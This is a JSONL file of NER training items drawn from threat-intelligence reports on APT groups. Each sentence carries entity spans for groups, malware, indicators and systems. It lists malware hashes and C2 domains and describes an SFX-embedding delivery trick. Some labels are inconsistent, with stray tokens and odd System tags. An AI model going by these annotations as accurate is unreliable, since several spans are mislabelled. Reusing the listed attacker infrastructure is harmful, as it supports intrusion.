{"text": "Due to overlapping TTPs , including similar custom tools , O DragonOK is thought to have a direct or indirect relationship with the threat group Moafee .", "spans": {"Organization: DragonOK": [[61, 69]], "Organization: group Moafee": [[139, 151]]}, "info": {"id": "aptner_train_002756", "source": "aptner_train"}}
{"text": "It is known to use a variety of malware , including Sysget / HelloBridge , PlugX , PoisonIvy , FormerFirstRat , NFlog , and NewCT .", "spans": {"Malware: Sysget": [[52, 58]], "Malware: HelloBridge": [[61, 72]], "Malware: PlugX": [[75, 80]], "Malware: PoisonIvy": [[83, 92]], "Malware: FormerFirstRat": [[95, 109]], "Malware: NFlog": [[112, 117]], "Malware: NewCT": [[124, 129]]}, "info": {"id": "aptner_train_002757", "source": "aptner_train"}}
{"text": "Dust Storm is a threat group that has targeted multiple industries in Japan , South Korea , the United States , Europe , and several Southeast Asian countries .", "spans": {"Organization: Dust Storm": [[0, 10]]}, "info": {"id": "aptner_train_002758", "source": "aptner_train"}}
{"text": "CopyKittens  is an Iranian cyber espionage group that has been operating since at least 2013 .", "spans": {"Organization: CopyKittens ": [[0, 12]]}, "info": {"id": "aptner_train_002759", "source": "aptner_train"}}
{"text": "It has targeted countries including Israel , Saudi Arabia , Turkey , the U.S. , Jordan , and Germany .", "spans": {}, "info": {"id": "aptner_train_002760", "source": "aptner_train"}}
{"text": "Tick Group Continues Attacks .", "spans": {"Organization: Tick": [[0, 4]]}, "info": {"id": "aptner_train_002761", "source": "aptner_train"}}
{"text": "The \" Tick \" group has conducted cyber espionage attacks against organizations in the Republic of Korea and Japan for several years .", "spans": {"Organization: Tick": [[6, 10]]}, "info": {"id": "aptner_train_002762", "source": "aptner_train"}}
{"text": "The group is known to use custom malware called Daserf , but also employs multiple commodity and custom tools , exploit vulnerabilities , and use social engineering techniques .", "spans": {"Malware: Daserf": [[48, 54]], "System: multiple commodity": [[74, 92]], "System: custom tools": [[97, 109]], "Vulnerability: vulnerabilities": [[120, 135]], "System: social engineering techniques": [[146, 175]]}, "info": {"id": "aptner_train_002764", "source": "aptner_train"}}
{"text": "With multiple tools and anonymous infrastructure , they are running longstanding and persistent attack campaigns .", "spans": {"System: multiple tools": [[5, 19]], "System: anonymous infrastructure": [[24, 48]]}, "info": {"id": "aptner_train_002765", "source": "aptner_train"}}
{"text": "We have observed that the adversary has repeatedly attacked a high-profile target in Japan using multiple malware families for the last three years .", "spans": {"Malware: malware families": [[106, 122]]}, "info": {"id": "aptner_train_002766", "source": "aptner_train"}}
{"text": "Symantec was first to publicly report on Tick , followed by LAC in 2016 .", "spans": {"Organization: Symantec": [[0, 8]], "Organization: Tick": [[41, 45]], "Organization: LAC": [[60, 63]]}, "info": {"id": "aptner_train_002767", "source": "aptner_train"}}
{"text": "These reports discussed the group ’s malware , Daserf ( a.k.a Muirim or Nioupale ) and some additional downloader programs .", "spans": {"Malware: Daserf": [[47, 53]], "Malware: Muirim": [[62, 68]], "Malware: Nioupale": [[72, 80]]}, "info": {"id": "aptner_train_002768", "source": "aptner_train"}}
{"text": "Though Daserf wasn’t a popular attack tool at the time of publishing the two reports , it dates back to at least 2011 .", "spans": {"Malware: Daserf": [[7, 13]]}, "info": {"id": "aptner_train_002769", "source": "aptner_train"}}
{"text": "Using AutoFocus , we were able to identify the link among Daserf and two other threats , 9002 and Invader .", "spans": {"Organization: AutoFocus": [[6, 15]], "Malware: Daserf": [[58, 64]], "Malware: 9002": [[89, 93]], "Malware: Invader": [[98, 105]]}, "info": {"id": "aptner_train_002770", "source": "aptner_train"}}
{"text": "These threats shared infrastructure between July 2012 and April 2013 .", "spans": {}, "info": {"id": "aptner_train_002771", "source": "aptner_train"}}
{"text": "Invader ( a.k.a Kickesgo ) is a backdoor that injects its main code into a legitimate process , such as explorer.exe , and has following functions :", "spans": {"Malware: Invader": [[0, 7]], "Malware: Kickesgo": [[16, 24]], "Indicator: explorer.exe": [[104, 116]]}, "info": {"id": "aptner_train_002772", "source": "aptner_train"}}
{"text": "Logs keystrokes and mouse movement Captures screenshots Opens cmd.exe shell Enumerates processes Executes programs Removes itself Enumerates all opening TCP and UDP ports .", "spans": {"Indicator: cmd.exe": [[62, 69]]}, "info": {"id": "aptner_train_002773", "source": "aptner_train"}}
{"text": "9002 is the infamous RAT frequently seen in targeted attacks reported by various security vendors , including Palo Alto Networks .", "spans": {"Malware: 9002": [[0, 4]], "Organization: Palo Alto Networks": [[110, 128]]}, "info": {"id": "aptner_train_002774", "source": "aptner_train"}}
{"text": "Interestingly , the C2 servers linking 9002 to Daserf were described in the report of an Adobe Flash Zero-day attack from FireEye in 2013 .", "spans": {"System: C2": [[20, 22]], "Malware: 9002": [[39, 43]], "Malware: Daserf": [[47, 53]], "System: Adobe Flash": [[89, 100]], "Vulnerability: Zero-day": [[101, 109]], "Organization: FireEye": [[122, 129]]}, "info": {"id": "aptner_train_002775", "source": "aptner_train"}}
{"text": "These domains were registered through the privacy protection services in 2008 and 2011 .", "spans": {}, "info": {"id": "aptner_train_002776", "source": "aptner_train"}}
{"text": "krjregh.sacreeflame.com lywja.healthsvsolu.com .", "spans": {"Indicator: krjregh.sacreeflame.com": [[0, 23]], "Indicator: lywja.healthsvsolu.com": [[24, 46]]}, "info": {"id": "aptner_train_002777", "source": "aptner_train"}}
{"text": "Though we don’t know the targets of these malware samples at the time of writing this article , we suspect the same group is behind these threats for a number of reasons .", "spans": {}, "info": {"id": "aptner_train_002778", "source": "aptner_train"}}
{"text": "The samples of Daserf that shared infrastructure were submitted to VirusTotal only from Japan multiple times in 2013 .", "spans": {"Malware: Daserf": [[15, 21]], "Organization: VirusTotal": [[67, 77]]}, "info": {"id": "aptner_train_002779", "source": "aptner_train"}}
{"text": "As noted in a later section , another Invader sample shared different C2 servers with Daserf .", "spans": {"Malware: Invader": [[38, 45]], "System: C2": [[70, 72]], "Malware: Daserf": [[86, 92]]}, "info": {"id": "aptner_train_002780", "source": "aptner_train"}}
{"text": "Symantec reported that Tick exploited additional Adobe Flash and Microsoft Office vulnerabilities .", "spans": {"Organization: Symantec": [[0, 8]], "Organization: Tick": [[23, 27]], "System: Adobe Flash": [[49, 60]], "System: Microsoft Office": [[65, 81]], "Vulnerability: vulnerabilities": [[82, 97]]}, "info": {"id": "aptner_train_002781", "source": "aptner_train"}}
{"text": "SecureWorks said the adversary group is abusing a previously undisclosed vulnerability in Japanese Software Asset Management system on endpoints .", "spans": {"Organization: SecureWorks": [[0, 11]], "Vulnerability: previously undisclosed vulnerability": [[50, 86]]}, "info": {"id": "aptner_train_002782", "source": "aptner_train"}}
{"text": "Therefore , Tick or their digital quartermaster is capable of deploying new and unique exploits .", "spans": {"Organization: Tick": [[12, 16]]}, "info": {"id": "aptner_train_002783", "source": "aptner_train"}}
{"text": "In July 2016 , we identified a compromised website in Japan that was hosting a Daserf variant .", "spans": {"Malware: Daserf variant": [[79, 93]]}, "info": {"id": "aptner_train_002784", "source": "aptner_train"}}
{"text": "The web server was also a C2 server for another threat , Minzen ( a.k.a , XXMM , Wali , or ShadowWali ) .", "spans": {"System: C2": [[26, 28]], "Malware: Minzen": [[57, 63]], "Malware: XXMM": [[74, 78]], "Malware: Wali": [[81, 85]], "Malware: ShadowWali": [[91, 101]]}, "info": {"id": "aptner_train_002785", "source": "aptner_train"}}
{"text": "The threat often uses compromised web servers in Japan and the Republic of Korea .", "spans": {}, "info": {"id": "aptner_train_002786", "source": "aptner_train"}}
{"text": "As Kaspersky and Cybereason recently posted , Minzen is a modular malware that has both 32-bit and 64-bit components in its resource section or configuration data in its body .", "spans": {"Organization: Kaspersky": [[3, 12]], "Organization: Cybereason": [[17, 27]], "Malware: Minzen": [[46, 52]]}, "info": {"id": "aptner_train_002787", "source": "aptner_train"}}
{"text": "One of the Minzen samples ( SHA256 : 9374040a9e2f47f7037edaac19f21ff1ef6a999ff98c306504f89a37196074a2 ) found in the Republic of Korea in December 2016 installs simple backdoor module as a final payload on a compromised computer .", "spans": {"Malware: Minzen": [[11, 17]], "Indicator: 9374040a9e2f47f7037edaac19f21ff1ef6a999ff98c306504f89a37196074a2": [[37, 101]]}, "info": {"id": "aptner_train_002788", "source": "aptner_train"}}
{"text": "It opens a TCP port and receives commands from a remote attacker .", "spans": {}, "info": {"id": "aptner_train_002789", "source": "aptner_train"}}
{"text": "According to the debug path in the body , the author of the tool called it “ NamelessHdoor , ” and its internal version is identified as “ V1.5. ”", "spans": {"Malware: NamelessHdoor": [[77, 90]]}, "info": {"id": "aptner_train_002790", "source": "aptner_train"}}
{"text": "The payload is based on “ Nameless Backdoor ” which has been publicly available for more than ten years .", "spans": {"Malware: Nameless Backdoor": [[26, 43]]}, "info": {"id": "aptner_train_002791", "source": "aptner_train"}}
{"text": "The oldest code we could identify was hosted on a famous Chinese source code sharing site since 2005 .", "spans": {}, "info": {"id": "aptner_train_002792", "source": "aptner_train"}}
{"text": "The author of the NamelessHdoor appears to have created additional versions of the Nameless Backdoor by removing unnecessary functions , and added open-source DLL injection code from ReflectiveDLLLoader .", "spans": {"Malware: the NamelessHdoor": [[14, 31]], "Malware: Nameless Backdoor": [[83, 100]], "System: DLL": [[159, 162]], "System: ReflectiveDLLLoader": [[183, 202]]}, "info": {"id": "aptner_train_002793", "source": "aptner_train"}}
{"text": "There is minimal public information regarding the Nameless Backdoor , except for the interesting report from Cyphort in 2015 .", "spans": {"Malware: Nameless Backdoor": [[50, 67]], "Organization: Cyphort": [[109, 116]]}, "info": {"id": "aptner_train_002794", "source": "aptner_train"}}
{"text": "The researcher of the company analyzed multiple threats , including Invader , Nioupale (Daserf ) and Hdoor found in an attack against an Asian financial institution .", "spans": {"Malware: Invader": [[68, 75]], "Malware: Nioupale": [[78, 86]], "Malware: Hdoor": [[101, 106]]}, "info": {"id": "aptner_train_002795", "source": "aptner_train"}}
{"text": "We examined the sample described in the report as Hdoor and found it ’s a previous version of the NamelessHdoor we discovered in the Minzen sample , but without support for DLL injection .", "spans": {"Malware: Hdoor": [[50, 55]], "Malware: NamelessHdoor": [[98, 111]], "System: DLL": [[173, 176]]}, "info": {"id": "aptner_train_002796", "source": "aptner_train"}}
{"text": "It turned out that the DLL files we found are a custom variant of Gh0st RAT , and the EXE files download the RAT .", "spans": {"System: DLL": [[23, 26]], "Malware: Gh0st RAT": [[66, 75]]}, "info": {"id": "aptner_train_002797", "source": "aptner_train"}}
{"text": "Since the source code is publicly available , Gh0st RAT has been used by multiple actors for years .", "spans": {"Malware: Gh0st RAT": [[46, 55]]}, "info": {"id": "aptner_train_002798", "source": "aptner_train"}}
{"text": "The domain , softfix.co.kr was registered in 2014 .", "spans": {"Indicator: softfix.co.kr": [[13, 26]]}, "info": {"id": "aptner_train_002799", "source": "aptner_train"}}
{"text": "One of subdomains , news.softfix.co.kr was the C2 server of Daserf ( 9c7a34390e92d4551c26a3feb5b181757b3309995acd1f92e0f63f888aa89423 ) .", "spans": {"Indicator: news.softfix.co.kr": [[20, 38]], "System: C2": [[47, 49]], "Malware: Daserf": [[60, 66]], "Indicator: 9c7a34390e92d4551c26a3feb5b181757b3309995acd1f92e0f63f888aa89423": [[69, 133]]}, "info": {"id": "aptner_train_002800", "source": "aptner_train"}}
{"text": "Another subdomain , bbs.softfix.co.kr was hosted on same IP address as bbs.gokickes.com , which was reported as the C2 server of Invader by Cyphort .", "spans": {"Indicator: bbs.softfix.co.kr": [[20, 37]], "Indicator: bbs.gokickes.com": [[71, 87]], "System: C2": [[116, 118]], "Malware: Invader": [[129, 136]], "Organization: Cyphort": [[140, 147]]}, "info": {"id": "aptner_train_002801", "source": "aptner_train"}}
{"text": "We also identified www.gokickes.com was the C2 of another Invader variant ( 57e1d3122e6dc88d9eb2989f081de88a0e6864e767281d509ff58834928895fb ) .", "spans": {"Indicator: www.gokickes.com": [[19, 35]], "System: C2": [[44, 46]], "Malware: Invader variant": [[58, 73]], "Indicator: 57e1d3122e6dc88d9eb2989f081de88a0e6864e767281d509ff58834928895fb": [[76, 140]]}, "info": {"id": "aptner_train_002802", "source": "aptner_train"}}
{"text": "In addition to the infrastructure , the attacker also shared code .", "spans": {}, "info": {"id": "aptner_train_002803", "source": "aptner_train"}}
{"text": "The Gh0st downloaders employ simple substitution ciphers for hiding strings .", "spans": {"Malware: Gh0st": [[4, 9]]}, "info": {"id": "aptner_train_002804", "source": "aptner_train"}}
{"text": "We also identified another malware family , HomamDownloader , sharing some servers with Daserf .", "spans": {"Malware: HomamDownloader": [[44, 59]], "Malware: Daserf": [[88, 94]]}, "info": {"id": "aptner_train_002805", "source": "aptner_train"}}
{"text": "An overview of the connections among these threats is discussed in below .", "spans": {}, "info": {"id": "aptner_train_002806", "source": "aptner_train"}}
{"text": "HomamDownloader is a small downloader program with minimal interesting characteristics from a technical point of view .", "spans": {"Malware: HomamDownloader": [[0, 15]]}, "info": {"id": "aptner_train_002807", "source": "aptner_train"}}
{"text": "HomamDownloader was discovered to be delivered by Tick via a spearphishing email .", "spans": {"Malware: HomamDownloader": [[0, 15]], "Organization: Tick": [[50, 54]], "System: email": [[75, 80]]}, "info": {"id": "aptner_train_002808", "source": "aptner_train"}}
{"text": "The adversary crafted credible email and attachment after understanding the targets and their behavior .", "spans": {"System: email": [[31, 36]]}, "info": {"id": "aptner_train_002809", "source": "aptner_train"}}
{"text": "The email below was sent from a personal email account with a subject line of “ New Year Wishes on January 1st ” .", "spans": {"System: email": [[4, 9], [41, 46]]}, "info": {"id": "aptner_train_002810", "source": "aptner_train"}}
{"text": "The message asked the recipient to rename the attachment extension from “ ._X_ ” to “ .exe ” and opening it with the password specified in the email to view the Happy New Year eCard in the correct and polite language .", "spans": {"Indicator: ._X_": [[74, 78]], "Indicator: .exe": [[86, 90]], "System: email": [[143, 148]]}, "info": {"id": "aptner_train_002811", "source": "aptner_train"}}
{"text": "In addition to the social engineering email technique , the attacker also employs a trick to the attachment .", "spans": {"System: email": [[38, 43]]}, "info": {"id": "aptner_train_002812", "source": "aptner_train"}}
{"text": "The actor embedded malicious code to a resource section of the legitimate SFX file created by a file encryption tool , and modified the entry point of the program for jumping to the malicious code soon after the SFX program starts .", "spans": {}, "info": {"id": "aptner_train_002813", "source": "aptner_train"}}
{"text": "The malicious code drops HomamDownloader , then jumps back to the regular flow in the CODE section , which in turn asks the user the password and decrypts the file .", "spans": {"Malware: HomamDownloader": [[25, 40]]}, "info": {"id": "aptner_train_002814", "source": "aptner_train"}}
{"text": "Therefore , once a user executes the attachment and sees the password dialog on SFX , the downloader dropped by the malicious code starts working even if the user chooses the Cancel on the password window .", "spans": {}, "info": {"id": "aptner_train_002815", "source": "aptner_train"}}
{"text": "Should the user become aware of the infection later , it may be difficult to find the cause due to the fact that the original embedded file contained within the SFX is benign .", "spans": {}, "info": {"id": "aptner_train_002816", "source": "aptner_train"}}
{"text": "Tick was spotted last year , but they are actively and silently attacking various organizations in South Korea and Japan for a number of years .", "spans": {"Organization: Tick": [[0, 4]]}, "info": {"id": "aptner_train_002817", "source": "aptner_train"}}
{"text": "While some of the group ’s tools , tactics , and procedures ( TTPs ) have been covered within this article , it is likely there is much that still remains uncovered .", "spans": {}, "info": {"id": "aptner_train_002818", "source": "aptner_train"}}
{"text": "Daserf : 04080fbab754dbf0c7529f8bbe661afef9c2cba74e3797428538ed5c243d705a .", "spans": {"Malware: Daserf": [[0, 6]], "Indicator: 04080fbab754dbf0c7529f8bbe661afef9c2cba74e3797428538ed5c243d705a": [[9, 73]]}, "info": {"id": "aptner_train_002819", "source": "aptner_train"}}
{"text": "Daserf : f8458a0711653071bf59a3153293771a6fb5d1de9af7ea814de58f473cba9d06 .", "spans": {"Malware: Daserf": [[0, 6]], "Indicator: f8458a0711653071bf59a3153293771a6fb5d1de9af7ea814de58f473cba9d06": [[9, 73]]}, "info": {"id": "aptner_train_002820", "source": "aptner_train"}}
{"text": "Daserf : e8edde4519763bb6669ba99e33b4803a7655805b8c3475b49af0a49913577e51 .", "spans": {"Malware: Daserf": [[0, 6]], "Indicator: e8edde4519763bb6669ba99e33b4803a7655805b8c3475b49af0a49913577e51": [[9, 73]]}, "info": {"id": "aptner_train_002821", "source": "aptner_train"}}
{"text": "Daserf : 21111136d523970e27833dd2db15d7c50803d8f6f4f377d4d9602ba9fbd355cd .", "spans": {"Malware: Daserf": [[0, 6]], "Indicator: 21111136d523970e27833dd2db15d7c50803d8f6f4f377d4d9602ba9fbd355cd": [[9, 73]]}, "info": {"id": "aptner_train_002822", "source": "aptner_train"}}
{"text": "Daserf : 9c7a34390e92d4551c26a3feb5b181757b3309995acd1f92e0f63f888aa89423 .", "spans": {"Malware: Daserf": [[0, 6]], "Indicator: 9c7a34390e92d4551c26a3feb5b181757b3309995acd1f92e0f63f888aa89423": [[9, 73]]}, "info": {"id": "aptner_train_002823", "source": "aptner_train"}}
{"text": "Invader : 0df20ccd074b722d5fe1358b329c7bdebcd7e3902a1ca4ca8d5a98cc5ce4c287 .", "spans": {"Malware: Invader": [[0, 7]], "Indicator: 0df20ccd074b722d5fe1358b329c7bdebcd7e3902a1ca4ca8d5a98cc5ce4c287": [[10, 74]]}, "info": {"id": "aptner_train_002824", "source": "aptner_train"}}
{"text": "Invader : e9574627349aeb7dd7f5b9f9c5ede7faa06511d7fdf98804526ca1b2e7ce127e .", "spans": {"Malware: Invader": [[0, 7]], "Indicator: e9574627349aeb7dd7f5b9f9c5ede7faa06511d7fdf98804526ca1b2e7ce127e": [[10, 74]]}, "info": {"id": "aptner_train_002825", "source": "aptner_train"}}
{"text": "Invader : 57e1d3122e6dc88d9eb2989f081de88a0e6864e767281d509ff58834928895fb . 9002 . 9002 . 9002 .", "spans": {"Malware: Invader": [[0, 7]], "Indicator: 57e1d3122e6dc88d9eb2989f081de88a0e6864e767281d509ff58834928895fb": [[10, 74]], "Malware: 9002": [[77, 81], [84, 88], [91, 95]]}, "info": {"id": "aptner_train_002826", "source": "aptner_train"}}
{"text": "Minzen : 797d9c00022eaa2f86ddc9374f60d7ad92128ca07204b3e2fe791c08da9ce2b1 .", "spans": {"Malware: Minzen": [[0, 6]], "Indicator: 797d9c00022eaa2f86ddc9374f60d7ad92128ca07204b3e2fe791c08da9ce2b1": [[9, 73]]}, "info": {"id": "aptner_train_002827", "source": "aptner_train"}}
{"text": "Minzen : 9374040a9e2f47f7037edaac19f21ff1ef6a999ff98c306504f89a37196074a2 .", "spans": {"Malware: Minzen": [[0, 6]], "Indicator: 9374040a9e2f47f7037edaac19f21ff1ef6a999ff98c306504f89a37196074a2": [[9, 73]]}, "info": {"id": "aptner_train_002828", "source": "aptner_train"}}
{"text": "Minzen : 26727d139b593486237b975e7bdf93a8148c52d5fb48d5fe540a634a16a6ba82 .", "spans": {"Malware: Minzen": [[0, 6]], "Indicator: 26727d139b593486237b975e7bdf93a8148c52d5fb48d5fe540a634a16a6ba82": [[9, 73]]}, "info": {"id": "aptner_train_002829", "source": "aptner_train"}}
{"text": "NamelessHdoor : dfc8a6da93481e9dab767c8b42e2ffbcd08fb813123c91b723a6e6d70196636f .", "spans": {"Malware: NamelessHdoor": [[0, 13]], "Indicator: dfc8a6da93481e9dab767c8b42e2ffbcd08fb813123c91b723a6e6d70196636f": [[16, 80]]}, "info": {"id": "aptner_train_002830", "source": "aptner_train"}}
{"text": "Gh0stRAt Downloader : ce47e7827da145823a6f2b755975d1d2f5eda045b4c542c9b9d05544f3a9b974 .", "spans": {"Malware: Gh0stRAt Downloader": [[0, 19]], "Indicator: ce47e7827da145823a6f2b755975d1d2f5eda045b4c542c9b9d05544f3a9b974": [[22, 86]]}, "info": {"id": "aptner_train_002831", "source": "aptner_train"}}
{"text": "Gh0stRAt Downloader : e34f4a9c598ad3bb243cb39969fb9509427ff9c08e63e8811ad26b72af046f0c .", "spans": {"Malware: Gh0stRAt Downloader": [[0, 19]], "Indicator: e34f4a9c598ad3bb243cb39969fb9509427ff9c08e63e8811ad26b72af046f0c": [[22, 86]]}, "info": {"id": "aptner_train_002832", "source": "aptner_train"}}
{"text": "Custom Gh0st : 8e5a0a5f733f62712b840e7f5051a2bd68508ea207e582a190c8947a06e26f40 .", "spans": {"Malware: Custom Gh0st": [[0, 12]], "Indicator: 8e5a0a5f733f62712b840e7f5051a2bd68508ea207e582a190c8947a06e26f40": [[15, 79]]}, "info": {"id": "aptner_train_002833", "source": "aptner_train"}}
{"text": "Datper : 7d70d659c421b50604ce3e0a1bf423ab7e54b9df361360933bac3bb852a31849 .", "spans": {"Malware: Datper": [[0, 6]], "Indicator: 7d70d659c421b50604ce3e0a1bf423ab7e54b9df361360933bac3bb852a31849": [[9, 73]]}, "info": {"id": "aptner_train_002834", "source": "aptner_train"}}
{"text": "HomamDownloader : a624d2cd6dee3b6150df3ca61ee0f992e2d6b08b3107f5b00f8bf8bcfe07ebe7 .", "spans": {"Malware: HomamDownloader": [[0, 15]], "Indicator: a624d2cd6dee3b6150df3ca61ee0f992e2d6b08b3107f5b00f8bf8bcfe07ebe7": [[18, 82]]}, "info": {"id": "aptner_train_002835", "source": "aptner_train"}}
{"text": "C2 : lywjrea.gmarketshop.net .", "spans": {"System: C2": [[0, 2]], "Indicator: lywjrea.gmarketshop.net": [[5, 28]]}, "info": {"id": "aptner_train_002836", "source": "aptner_train"}}
{"text": "C2 : krjregh.sacreeflame.com .", "spans": {"System: C2": [[0, 2]], "Indicator: krjregh.sacreeflame.com": [[5, 28]]}, "info": {"id": "aptner_train_002837", "source": "aptner_train"}}
{"text": "C2 : psfir.sacreeflame.com .", "spans": {"System: C2": [[0, 2]], "Indicator: psfir.sacreeflame.com": [[5, 26]]}, "info": {"id": "aptner_train_002838", "source": "aptner_train"}}
{"text": "C2 : lywja.healthsvsolu.com .", "spans": {"System: C2": [[0, 2]], "Indicator: lywja.healthsvsolu.com": [[5, 27]]}, "info": {"id": "aptner_train_002839", "source": "aptner_train"}}
{"text": "C2 : phot.healthsvsolu.com .", "spans": {"System: C2": [[0, 2]], "Indicator: phot.healthsvsolu.com": [[5, 26]]}, "info": {"id": "aptner_train_002840", "source": "aptner_train"}}
{"text": "C2 : blog.softfix.co.kr .", "spans": {"System: C2": [[0, 2]], "Indicator: blog.softfix.co.kr": [[5, 23]]}, "info": {"id": "aptner_train_002841", "source": "aptner_train"}}
{"text": "C2 : news.softfix.co.kr .", "spans": {"System: C2": [[0, 2]], "Indicator: news.softfix.co.kr": [[5, 23]]}, "info": {"id": "aptner_train_002842", "source": "aptner_train"}}
{"text": "C2 : www.gokickes.com .", "spans": {"System: C2": [[0, 2]], "Indicator: www.gokickes.com": [[5, 21]]}, "info": {"id": "aptner_train_002843", "source": "aptner_train"}}
{"text": "C2 : log.gokickes.com .", "spans": {"System: C2": [[0, 2]], "Indicator: log.gokickes.com": [[5, 21]]}, "info": {"id": "aptner_train_002844", "source": "aptner_train"}}
{"text": "The group is responsible for the campaign known as Operation Wilted Tulip .", "spans": {}, "info": {"id": "aptner_train_002845", "source": "aptner_train"}}
{"text": "Dark Caracal is threat group that has been attributed to the Lebanese General Directorate of General Security ( GDGS ) and has operated since at least 2012 .", "spans": {"Organization: Dark Caracal": [[0, 12]], "Organization: General Directorate of General Security": [[70, 109]], "Organization: GDGS": [[112, 116]]}, "info": {"id": "aptner_train_002846", "source": "aptner_train"}}
{"text": "Darkhotel  is a threat group that has been active since at least 2004 .", "spans": {"Organization: Darkhotel ": [[0, 10]]}, "info": {"id": "aptner_train_002847", "source": "aptner_train"}}
{"text": "The group has conducted activity on hotel and business center Wi‑Fi and physical connections as well as peer-to-peer and file sharing networks .", "spans": {}, "info": {"id": "aptner_train_002848", "source": "aptner_train"}}
{"text": "The actors have also conducted spearphishing .", "spans": {}, "info": {"id": "aptner_train_002849", "source": "aptner_train"}}
{"text": "Unknown .", "spans": {}, "info": {"id": "aptner_train_002850", "source": "aptner_train"}}
{"text": "They appear to focus on targeting individuals of interest to Iran who work in academic research , human rights , and media , with most victims having been located in Iran , the US , Israel , and the UK .", "spans": {}, "info": {"id": "aptner_train_002852", "source": "aptner_train"}}
{"text": "Charming Kitten usually tries to access private email and Facebook accounts , and sometimes establishes a foothold on victim computers as a secondary objective .", "spans": {"Organization: Charming Kitten": [[0, 15]], "System: email": [[48, 53]], "Organization: Facebook": [[58, 66]]}, "info": {"id": "aptner_train_002853", "source": "aptner_train"}}
{"text": "The group 's TTPs overlap extensively with another group , O Magic Hound , resulting in reporting that may not distinguish between the two groups' activities .", "spans": {"Organization: Magic Hound": [[61, 72]]}, "info": {"id": "aptner_train_002854", "source": "aptner_train"}}
{"text": "Cleaver : Threat Group 2889 , TG-2889 .", "spans": {"Organization: Cleaver": [[0, 7]], "Organization: Threat Group 2889": [[10, 27]], "Organization: TG-2889": [[30, 37]]}, "info": {"id": "aptner_train_002855", "source": "aptner_train"}}
{"text": "Cleaver is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver .", "spans": {"Organization: Cleaver": [[0, 7]]}, "info": {"id": "aptner_train_002856", "source": "aptner_train"}}
{"text": "Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 ( TG-2889 ) .", "spans": {"Organization: Cleaver": [[40, 47]], "Organization: Threat Group 2889": [[61, 78]], "Organization: TG-2889": [[81, 88]]}, "info": {"id": "aptner_train_002857", "source": "aptner_train"}}
{"text": "Cobalt Group : Cobalt Gang , Cobalt Spider .", "spans": {"Organization: Cobalt Group": [[0, 12]], "Organization: Cobalt Gang": [[15, 26]], "Organization: Cobalt Spider": [[29, 42]]}, "info": {"id": "aptner_train_002858", "source": "aptner_train"}}
{"text": "The group has conducted intrusions to steal money via targeting ATM systems , card processing , payment systems and SWIFT systems .", "spans": {"System: ATM systems": [[64, 75]], "System: payment systems": [[96, 111]], "System: SWIFT systems": [[116, 129]]}, "info": {"id": "aptner_train_002860", "source": "aptner_train"}}
{"text": "Cobalt Group has mainly targeted banks in Eastern Europe , Central Asia , and Southeast Asia .", "spans": {"Organization: Cobalt Group": [[0, 12]]}, "info": {"id": "aptner_train_002861", "source": "aptner_train"}}
{"text": "One of the alleged leaders was arrested in Spain in early 2018 , but the group still appears to be active .", "spans": {}, "info": {"id": "aptner_train_002862", "source": "aptner_train"}}
{"text": "The group has been known to target organizations in order to use their access to then compromise additional victims .", "spans": {}, "info": {"id": "aptner_train_002863", "source": "aptner_train"}}
{"text": "Reporting indicates there may be links between O Cobalt Group and both the malware O Carbanak and the group O Carbanak .", "spans": {"Organization: Cobalt Group": [[49, 61]], "Malware: Carbanak": [[85, 93]], "Organization: Carbanak": [[110, 118]]}, "info": {"id": "aptner_train_002864", "source": "aptner_train"}}
{"text": "Taidoor is a threat group that has operated since at least 2009 and has primarily targeted the Taiwanese government .", "spans": {"Organization: Taidoor": [[0, 7]], "Organization: Taiwanese government": [[95, 115]]}, "info": {"id": "aptner_train_002865", "source": "aptner_train"}}
{"text": "TEMP.Veles ： XENOTIME .", "spans": {"Organization: TEMP.Veles": [[0, 10]], "Organization: XENOTIME": [[13, 21]]}, "info": {"id": "aptner_train_002866", "source": "aptner_train"}}
{"text": "TEMP.Veles is a Russia based threat group that has targeted critical infrastructure .", "spans": {"Organization: TEMP.Veles": [[0, 10]]}, "info": {"id": "aptner_train_002867", "source": "aptner_train"}}
{"text": "The group has been observed utilizing TRITON , a malware framework designed to manipulate industrial safety systems .", "spans": {"Malware: TRITON": [[38, 44]]}, "info": {"id": "aptner_train_002868", "source": "aptner_train"}}
{"text": "The White Company is a likely state-sponsored threat actor with advanced capabilities .", "spans": {"Organization: The White Company": [[0, 17]]}, "info": {"id": "aptner_train_002869", "source": "aptner_train"}}
{"text": "From 2017 through 2018 , the group led an espionage campaign called Operation Shaheen targeting government and military organizations in Pakistan .", "spans": {"Organization: government": [[96, 106]], "Organization: military organizations": [[111, 133]]}, "info": {"id": "aptner_train_002870", "source": "aptner_train"}}
{"text": "Molerats : Operation Molerats , Gaza Cybergang .", "spans": {"Organization: Molerats": [[0, 8]], "Organization: Operation Molerats": [[11, 29]], "Organization: Gaza Cybergang": [[32, 46]]}, "info": {"id": "aptner_train_002871", "source": "aptner_train"}}
{"text": "Molerats is a politically-motivated threat group that has been operating since 2012 .", "spans": {"Organization: Molerats": [[0, 8]]}, "info": {"id": "aptner_train_002872", "source": "aptner_train"}}
{"text": "The group 's victims have primarily been in the Middle East , Europe , and the United States .", "spans": {}, "info": {"id": "aptner_train_002873", "source": "aptner_train"}}
{"text": "MuddyWater : Seedworm , TEMP.Zagros .", "spans": {"Organization: MuddyWater": [[0, 10]], "Organization: Seedworm": [[13, 21]], "Organization: TEMP.Zagros": [[24, 35]]}, "info": {"id": "aptner_train_002874", "source": "aptner_train"}}
{"text": "MuddyWater is an Iranian threat group that has primarily targeted Middle Eastern nations , and has also targeted European and North American nations .", "spans": {"Organization: MuddyWater": [[0, 10]]}, "info": {"id": "aptner_train_002875", "source": "aptner_train"}}
{"text": "The group 's victims are mainly in the telecommunications , government ( IT services ) , and oil sectors .", "spans": {"Organization: telecommunications": [[39, 57]], "Organization: government": [[60, 70]], "Organization: IT services": [[73, 84]], "Organization: oil sectors": [[93, 104]]}, "info": {"id": "aptner_train_002876", "source": "aptner_train"}}
{"text": "Activity from this group was previously linked to FIN7 , but the group is believed to be a distinct group possibly motivated by espionage .", "spans": {"Organization: FIN7": [[50, 54]]}, "info": {"id": "aptner_train_002877", "source": "aptner_train"}}
{"text": "Naikon is a threat group that has focused on targets around the South China Sea .", "spans": {"Organization: Naikon": [[0, 6]]}, "info": {"id": "aptner_train_002878", "source": "aptner_train"}}
